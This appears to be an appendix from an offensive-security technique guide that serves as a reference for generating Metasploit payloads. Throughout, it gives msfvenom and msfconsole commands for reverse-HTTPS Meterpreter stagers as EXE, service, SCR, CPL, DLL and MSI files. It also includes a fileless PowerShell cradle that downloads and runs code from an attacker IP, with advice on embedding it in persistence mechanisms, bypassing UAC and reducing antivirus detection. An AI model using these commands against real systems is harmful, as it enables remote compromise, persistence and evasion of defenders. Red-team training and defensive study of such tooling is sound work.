Skip to main content

Metasploit Payloads

This appendix is a centralized reference for generating Metasploit payloads used throughout this document. All msfvenom commands run on Kali. Each section corresponds to a payload format referenced in a specific technique file.


Listeners​

Standard Reverse HTTPS Listener​

Used for all staged payloads (reverse_https). Run once; it will catch sessions from any payload pointing to the same LHOST/LPORT:

msfconsole -x "use exploit/multi/handler;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"

Web Delivery Listener (Fileless PowerShell Cradle)​

Used when you need a PowerShell download cradle instead of a dropped EXE. The module hosts the shellcode stager and generates the PS one-liner to run on the victim:

msfconsole -x "use exploit/multi/script/web_delivery;
set SRVHOST 0.0.0.0;
set SRVPORT 8443;
set SSL true;
set target 2;
set payload windows/x64/meterpreter/reverse_https;
set LHOST 0.0.0.0;
set LPORT 443;
run -j;"

Cleaning up the generated cradle:

The module outputs a PowerShell one-liner like:

powershell.exe -nop -w hidden -e <BASE64>

Or a longer string form:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Q=new-object net.webclient;IEX $Q.downloadstring("https://0.0.0.0:8443/AbcXyz");

Before embedding in any technique (WMI subscription, Run key, scheduled task), clean it up:

  1. Replace 0.0.0.0 with your actual attacker IP
  2. If using the string form: replace single quotes with double quotes and wrap the whole string in single quotes so it can be stored in a variable or cmd /c argument
  3. Test the cleaned cradle from a fresh PS window before embedding it in a persistence mechanism

Canonical cleaned form:

'[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Q=new-object net.webclient;IEX $Q.downloadstring("https://192.168.1.50:8443/AbcXyz");'

This goes into $PS_COMMAND variables throughout the persistence and defense evasion technique files.


EXE Payloads​

Standard Reverse HTTPS EXE​

Used for: BITS Jobs (T1197), Scheduled Tasks (T1053), Startup Folder (T1547.001), Lateral Movement (T1021), Ingress Tool Transfer (T1105)

ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.exe

Service-Compatible EXE​

Used for: Windows Service (T1543.003)

Implements StartServiceCtrlDispatcher so the Service Control Manager can manage the process lifecycle. A standard EXE will fail with "Error 1053" when installed as a service.

ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe-service -o svc_payload.exe

Screensaver / CPL EXE (.scr / .cpl)​

Used for: Screensaver (T1546.002), UAC Bypass via Control Panel (T1548.002)

The file format is identical to a standard EXE - only the extension changes. msfvenom generates a standard EXE; rename or specify the output filename:

# .scr for screensaver persistence
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.scr

# .cpl for Control Panel UAC bypass
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f exe -o payload.cpl

DLL Payloads​

Standard Reverse HTTPS DLL​

Used for: DLL Hijacking (T1574.001 / T1574.010 / T1574.011), COM Hijacking (T1546.015), IFEO Injection (T1546.012 DLL variant)

ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f dll -o payload.dll
caution

msfvenom DLL payloads execute their shellcode from DllMain. This means the shellcode runs in the context of whatever process loads the DLL. If that process expects the DLL to export specific functions (e.g., a DLL hijack target that calls GetVersion), the load will succeed and the shellcode will fire, but the host process may crash or hang if the expected export is missing. For DLL hijacking, use a compiled DLL with the correct exports forwarded - see Compiled Payloads - DLL with Export Forwarding.


MSI Payloads​

Reverse HTTPS MSI Installer​

Used for: Ingress Tool Transfer via msiexec /i (T1105)

ATTACKER_IP="<ATTACKER_IP>"
msfvenom -p windows/x64/meterpreter/reverse_https LHOST="${ATTACKER_IP}" LPORT=443 -f msi -o payload.msi

The MSI runs the Meterpreter stager via a custom action during installation. The session arrives during the msiexec /i execution - no separate launch step needed.


Payload Reference Table​

TechniqueFormatmsfvenom -f flagListener type
Run Keys, Scheduled Task, BITS, Startup FolderEXEexemulti/handler
Windows ServiceService EXEexe-servicemulti/handler
ScreensaverEXE (rename .scr)exemulti/handler
Control Panel UAC BypassEXE (rename .cpl)exemulti/handler
DLL Hijacking, COM HijackingDLLdllmulti/handler
msiexec /i downloadMSImsimulti/handler
WMI Event Subscription, Registry Run (fileless)PowerShell cradleN/Aweb_delivery
Regsvr32, Mshta, Wscript (fileless)PowerShell cradleN/Aweb_delivery

Common msfvenom Options​

OptionValuesNotes
-pwindows/x64/meterpreter/reverse_httpsUse x64 for modern targets; use windows/meterpreter/reverse_https (no x64) for 32-bit targets only
LHOSTYour Kali IPUse the IP reachable from the victim - not 127.0.0.1 or 0.0.0.0
LPORT443Port 443 blends in as HTTPS; ensure your multi/handler listener is on the same port
-fSee table aboveOutput format
-oFilenameOutput file; include the correct extension (.exe, .dll, .msi, .scr, .cpl)
-ex64/xor_dynamicEncoder - reduces AV detection slightly; not a substitute for custom payloads
-iIntegerEncoding iterations - e.g., -e x64/xor_dynamic -i 5